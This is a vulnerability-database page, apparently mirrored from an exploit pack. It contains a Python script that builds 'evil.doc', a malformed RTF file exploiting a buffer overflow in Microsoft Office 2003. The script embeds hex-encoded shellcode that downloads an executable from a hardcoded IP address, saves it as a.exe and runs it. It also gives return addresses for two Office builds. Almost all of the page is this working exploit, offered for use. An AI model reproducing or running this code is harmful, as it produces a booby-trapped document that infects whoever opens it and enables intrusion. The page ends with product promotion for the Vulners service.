Lucene search
K

Microsoft-Office-2003-HomePro

🗓️ 05 Jan 2015 16:26:22Reported by b33fType 
exploitpack
 exploitpack
👁 11 Views

Raw file structure for a malicious Office 2003 document with a payload to download and execute malicious code as "a.exe". Exploits different versions and requires different pointers to ESP

Code
import binascii
 
filename = "evil.doc"
 
#-----------------------------------------------------------------------------------#
# File Structure                                                                    #
#-----------------------------------------------------------------------------------#
file = (
"{\\rt##{\shp{\sp}}{\shp{\sp}}{\shp{\sp}}{\shp{\*\shpinst\shpfhdr0\shpbxcolumn\s"
"hpbypara\sh pwr2}{\sp{\sn {}{}{\sn}{\sn}{\*\*}pFragments}{\*\*\*}{\sv{\*\*\*\*\*"
"\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*}9;2;ffffffffff")
 
#-----------------------------------------------------------------------------------#
# Open raw socket to download payload to parent directory as "a.exe"                #
# ==> cmd execute "a.exe"                                                           #
#-----------------------------------------------------------------------------------#
magic = (
"\x65\x62\x37\x37\x33\x31\x63\x39\x36\x34\x38\x62\x37\x31\x33\x30"
"\x38\x62\x37\x36\x30\x63\x38\x62\x37\x36\x31\x63\x38\x62\x35\x65"
"\x30\x38\x38\x62\x37\x65\x32\x30\x38\x62\x33\x36\x36\x36\x33\x39"
"\x34\x66\x31\x38\x37\x35\x66\x32\x63\x33\x36\x30\x38\x62\x36\x63"
"\x32\x34\x32\x34\x38\x62\x34\x35\x33\x63\x38\x62\x35\x34\x30\x35"
"\x37\x38\x30\x31\x65\x61\x38\x62\x34\x61\x31\x38\x38\x62\x35\x61"
"\x32\x30\x30\x31\x65\x62\x65\x33\x33\x34\x34\x39\x38\x62\x33\x34"
"\x38\x62\x30\x31\x65\x65\x33\x31\x66\x66\x33\x31\x63\x30\x66\x63"
"\x61\x63\x38\x34\x63\x30\x37\x34\x30\x37\x63\x31\x63\x66\x30\x64"
"\x30\x31\x63\x37\x65\x62\x66\x34\x33\x62\x37\x63\x32\x34\x32\x38"
"\x37\x35\x65\x31\x38\x62\x35\x61\x32\x34\x30\x31\x65\x62\x36\x36"
"\x38\x62\x30\x63\x34\x62\x38\x62\x35\x61\x31\x63\x30\x31\x65\x62"
"\x38\x62\x30\x34\x38\x62\x30\x31\x65\x38\x38\x39\x34\x34\x32\x34"
"\x31\x63\x36\x31\x63\x33\x65\x38\x39\x32\x66\x66\x66\x66\x66\x66"
"\x35\x66\x38\x31\x65\x66\x39\x38\x66\x66\x66\x66\x66\x66\x65\x62"
"\x30\x35\x65\x38\x65\x64\x66\x66\x66\x66\x66\x66\x36\x38\x38\x65"
"\x34\x65\x30\x65\x65\x63\x35\x33\x65\x38\x39\x34\x66\x66\x66\x66"
"\x66\x66\x33\x31\x63\x39\x36\x36\x62\x39\x36\x66\x36\x65\x35\x31"
"\x36\x38\x37\x35\x37\x32\x36\x63\x36\x64\x35\x34\x66\x66\x64\x30"
"\x36\x38\x33\x36\x31\x61\x32\x66\x37\x30\x35\x30\x65\x38\x37\x61"
"\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x35\x31\x35\x31\x38\x64"
"\x33\x37\x38\x31\x63\x36\x65\x65\x66\x66\x66\x66\x66\x66\x38\x64"
"\x35\x36\x30\x63\x35\x32\x35\x37\x35\x31\x66\x66\x64\x30\x36\x38"
"\x39\x38\x66\x65\x38\x61\x30\x65\x35\x33\x65\x38\x35\x62\x66\x66"
"\x66\x66\x66\x66\x34\x31\x35\x31\x35\x36\x66\x66\x64\x30\x36\x38"
"\x37\x65\x64\x38\x65\x32\x37\x33\x35\x33\x65\x38\x34\x62\x66\x66"
"\x66\x66\x66\x66\x66\x66\x64\x30\x36\x33\x36\x64\x36\x34\x32\x65"
"\x36\x35\x37\x38\x36\x35\x32\x30\x32\x66\x36\x33\x32\x30\x32\x30"
"\x36\x31\x32\x65\x36\x35\x37\x38\x36\x35\x30\x30")
 
#------------------------------------------------------------------------------------------------------------------------------#
# Two versions of office 2003 floating around:                                                                                 #
# (1) Standalone version, (2) XP Service Pack upgrade                                                                          #
################################################################################################################################
# Unfortunatly though the exploit works perfectly for both versions they require different pointers to ESP...                  #
#                                                                                                                              #
# (1) 0x30324366 - CALL ESP - WINWORD.exe => "\x36\x36\x34\x33\x33\x32\x33\x30"                                                #
# => http://download.microsoft.com/download/6/2/3/6233A257-16BD-4C8D-BF4C-6FA59AF9213A/OfficeSTD.exe                           #
#                                                                                                                              #
# (2) 0x30402655 - PUSH ESP -> RETN - WINWORD.exe => "\x35\x35\x32\x36\x34\x30\x33\x30"                                        #
# => http://download.microsoft.com/download/7/7/8/778493c2-ace3-44c5-8bc3-d102da80e0f6/Office2003SP3-KB923618-FullFile-ENU.exe #
#------------------------------------------------------------------------------------------------------------------------------#
 
EIP = "\x36\x36\x34\x33\x33\x32\x33\x30" #should ascii convert the Little Endian pointer
 
filler = "\x30\x30\x30\x30\x38\x30\x37\x63"*2 + "\x41"*24 + "\x39\x30"*18
 
buffer = "\x23"*501 + "\x30\x35" + "\x30"*40 + EIP + filler + magic
 
#-----------------------------------------------------------------------------------#
# Since we are downloading our payload from a remote webserver there are no         #
# restrictions on payload size or badcharacters...                                  #
#-----------------------------------------------------------------------------------#
 
URL = "http://192.168.111.132/magic.exe"
binnu = binascii.b2a_hex(URL)
 
URL2 = "00"
nxt="{}}}}}}"
nxt+="\x0d\x0a"
nxt+="}"
 
textfile = open(filename , 'w')
textfile.write(file+buffer+binnu+URL2+nxt)
textfile.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation